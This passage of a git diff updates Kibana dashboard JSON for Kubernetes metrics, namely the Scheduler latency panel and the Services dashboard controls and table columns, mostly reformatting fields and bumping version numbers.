"formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "ms" - } - }, - "formula": "last_value(kubernetes.scheduler.client.request.duration.us.sum)/last_value(kubernetes.scheduler.client.request.duration.us.count)/1000", - "isFormulaBroken": false - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "scale": "ratio" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.client.request.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Average latency in ms", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.client.request.duration.us.sum" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.client.request.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of Average latency in ms", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.client.request.duration.us.count" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Average latency in ms", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "name": "divide", - "type": "function" - }, - 1000 - ], - "location": { - "max": 134, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.scheduler.client.request.duration.us.sum)/last_value(kubernetes.scheduler.client.request.duration.us.count)/1000", - "type": "function" - } - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "scale": "ratio" - }, - "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "43097f7a-e478-47bc-81c1-7541bd899d46": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average latency in ms", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "ms" + } }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "43097f7a-e478-47bc-81c1-7541bd899d46" - ], - "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", - "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "yConfig": [] - } - ], - "legend": { - "horizontalAlignment": "right", - "isInside": false, - "isVisible": true, - "legendSize": "large", - "maxLines": 1, - "position": "right", - "shouldTruncate": false, - "verticalAlignment": "bottom" + "formula": "last_value(kubernetes.scheduler.client.request.duration.us.sum)/last_value(kubernetes.scheduler.client.request.duration.us.count)/1000", + "isFormulaBroken": false + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "scale": "ratio" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.client.request.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.client.request.duration.us.sum" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.client.request.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.client.request.duration.us.count" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "name": "divide", + "type": "function" }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" + 1000 + ], + "location": { + "max": 134, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.scheduler.client.request.duration.us.sum)/last_value(kubernetes.scheduler.client.request.duration.us.count)/1000", + "type": "function" } + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 13, - "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "w": 24, - "x": 0, - "y": 87 + "layers": [ + { + "accessors": [ + "43097f7a-e478-47bc-81c1-7541bd899d46" + ], + "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", + "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "yConfig": [] + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": true, + "legendSize": "large", + "maxLines": 1, + "position": "right", + "shouldTruncate": false, + "verticalAlignment": "bottom" }, - "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "title": "Average request latency", - "type": "lens", - "version": "8.6.0" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Scheduler", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-04-24T13:36:10.877Z", - "id": "kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a2b844d8-11e3-4469-af4b-744d33b603ad:indexpattern-datasource-layer-0c578d26-c937-4b73-a3a6-e15ebd5854e6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "125ec894-444e-486b-a9c8-7205cde12a7e:indexpattern-datasource-layer-8cad09ad-7860-45ac-aaad-7b94af09c33d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e6506b77-2e3b-4bfa-831a-8a5daada553b:indexpattern-datasource-layer-af585c84-2ebf-42a3-9073-4d76e8b2610d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "181a3fe5-e5b5-472e-98af-ea4aaadc3109:indexpattern-datasource-layer-c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "181a3fe5-e5b5-472e-98af-ea4aaadc3109:c038d00b-5e03-420e-9c45-a8aea3c41f99", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d35d8849-89ba-42b8-8120-c14b087f9690:indexpattern-datasource-layer-2b43c72b-5964-4c48-8239-72a42fbe334f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6:metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:6572ee4d-01b4-47db-8804-d8ef217e21da", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:55eaa53f-a391-4996-9721-2f7af9aa963d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3a26dffa-0696-485d-b991-1dbc5092082e:indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3a26dffa-0696-485d-b991-1dbc5092082e:09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:695725fe-9d35-49c6-8289-21fbe54ff2a6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a0716ae8-4157-473d-8eba-8ff6625fed4b:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a0716ae8-4157-473d-8eba-8ff6625fed4b:36494898-fe02-477e-9364-d94ea0fcb947", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1604f0de-edd6-456e-8670-ab9b33988abb:38ef18ec-512c-4c90-ad86-214a5c9bfe9d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "668a51aa-98da-465e-9b09-d49e4f219968:indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "668a51aa-98da-465e-9b09-d49e4f219968:f3653393-ef8e-45e9-8b91-5a0472ecf752", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:c61ac757-89a1-4673-86b7-698a0d48e06e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView", - "type": "index-pattern" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView", - "type": "index-pattern" - } + "title": "Average request latency" + } ], - "type": "dashboard", - "updated_at": "2023-01-11T16:15:10.039Z", - "version": "WzM0NzYsMV0=" + "timeRestore": false, + "title": "[Metrics Kubernetes] Scheduler", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a2b844d8-11e3-4469-af4b-744d33b603ad:indexpattern-datasource-layer-0c578d26-c937-4b73-a3a6-e15ebd5854e6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "125ec894-444e-486b-a9c8-7205cde12a7e:indexpattern-datasource-layer-8cad09ad-7860-45ac-aaad-7b94af09c33d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e6506b77-2e3b-4bfa-831a-8a5daada553b:indexpattern-datasource-layer-af585c84-2ebf-42a3-9073-4d76e8b2610d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "181a3fe5-e5b5-472e-98af-ea4aaadc3109:indexpattern-datasource-layer-c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "181a3fe5-e5b5-472e-98af-ea4aaadc3109:c038d00b-5e03-420e-9c45-a8aea3c41f99", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d35d8849-89ba-42b8-8120-c14b087f9690:indexpattern-datasource-layer-2b43c72b-5964-4c48-8239-72a42fbe334f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6:metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:6572ee4d-01b4-47db-8804-d8ef217e21da", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:55eaa53f-a391-4996-9721-2f7af9aa963d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3a26dffa-0696-485d-b991-1dbc5092082e:indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3a26dffa-0696-485d-b991-1dbc5092082e:09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:695725fe-9d35-49c6-8289-21fbe54ff2a6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a0716ae8-4157-473d-8eba-8ff6625fed4b:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a0716ae8-4157-473d-8eba-8ff6625fed4b:36494898-fe02-477e-9364-d94ea0fcb947", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1604f0de-edd6-456e-8670-ab9b33988abb:38ef18ec-512c-4c90-ad86-214a5c9bfe9d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "668a51aa-98da-465e-9b09-d49e4f219968:indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "668a51aa-98da-465e-9b09-d49e4f219968:f3653393-ef8e-45e9-8b91-5a0472ecf752", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:c61ac757-89a1-4673-86b7-698a0d48e06e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013.json index f9ba2707c5c..6dd3d4d8ce2 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013.json @@ -1,309 +1,318 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"baa3640d-f954-4b56-ade6-01393a3991bc\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"baa3640d-f954-4b56-ade6-01393a3991bc\",\"enhancements\":{}}},\"5822d806-385b-435c-b83e-79e38e38fbb6\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"5822d806-385b-435c-b83e-79e38e38fbb6\",\"enhancements\":{}}},\"c749b037-7a98-4555-822b-cb9a52395dbb\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.service.name\",\"title\":\"Service Name\",\"id\":\"c749b037-7a98-4555-822b-cb9a52395dbb\",\"enhancements\":{}}}}" + "id": "kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1NywyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "twoLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"baa3640d-f954-4b56-ade6-01393a3991bc\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"baa3640d-f954-4b56-ade6-01393a3991bc\",\"enhancements\":{}}},\"5822d806-385b-435c-b83e-79e38e38fbb6\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"5822d806-385b-435c-b83e-79e38e38fbb6\",\"enhancements\":{}}},\"c749b037-7a98-4555-822b-cb9a52395dbb\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.service.name\",\"title\":\"Service Name\",\"id\":\"c749b037-7a98-4555-822b-cb9a52395dbb\",\"enhancements\":{}}}}" + }, + "description": "Metrics about Services", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "60c70dea-d4f0-43ea-a43f-7927dcf5c34d", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Metrics about Services", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "60c70dea-d4f0-43ea-a43f-7927dcf5c34d", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "3df5f644-b37e-471c-b2c5-ad4db122d1de", + "w": 48, + "x": 0, + "y": 4 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "3df5f644-b37e-471c-b2c5-ad4db122d1de", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-15362d53-5f27-48a6-a339-8a5fc2c5339d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "009fece4-2d13-4c71-aeef-56c7288e17bf", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "15362d53-5f27-48a6-a339-8a5fc2c5339d": { + "columnOrder": [ + "5bcc83c1-a9ef-4489-841c-e5c6e82f346b", + "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f", + "2d715eff-85bb-431f-a5a6-3432b6a704a9", + "07f7d695-1388-41fb-a4fc-4bf13d299688", + "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6", + "226bd103-5a5d-4756-bbc5-2c7f5da03488" + ], + "columns": { + "07f7d695-1388-41fb-a4fc-4bf13d299688": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Cluster IP", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.service.cluster_ip" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "226bd103-5a5d-4756-bbc5-2c7f5da03488": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Created", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.service.created" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "60c70dea-d4f0-43ea-a43f-7927dcf5c34d", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "60c70dea-d4f0-43ea-a43f-7927dcf5c34d", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-15362d53-5f27-48a6-a339-8a5fc2c5339d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "009fece4-2d13-4c71-aeef-56c7288e17bf", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "15362d53-5f27-48a6-a339-8a5fc2c5339d": { - "columnOrder": [ - "5bcc83c1-a9ef-4489-841c-e5c6e82f346b", - "5288fb8d-2eec-4da6-a9e6-81e6ee0a429f", - "2d715eff-85bb-431f-a5a6-3432b6a704a9", - "07f7d695-1388-41fb-a4fc-4bf13d299688", - "8d4e5a02-d3f5-4960-b3a9-121f64d42ba6", - "226bd103-5a5d-4756-bbc5-2c7f5da03488" - ], - "columns": { - "07f7d695-1388-41fb-a4fc-4bf13d299688": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Cluster IP", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.service.cluster_ip" - }, - "226bd103-5a5d-4756-bbc5-2c7f5da03488": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Created", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.service.created" - }, - 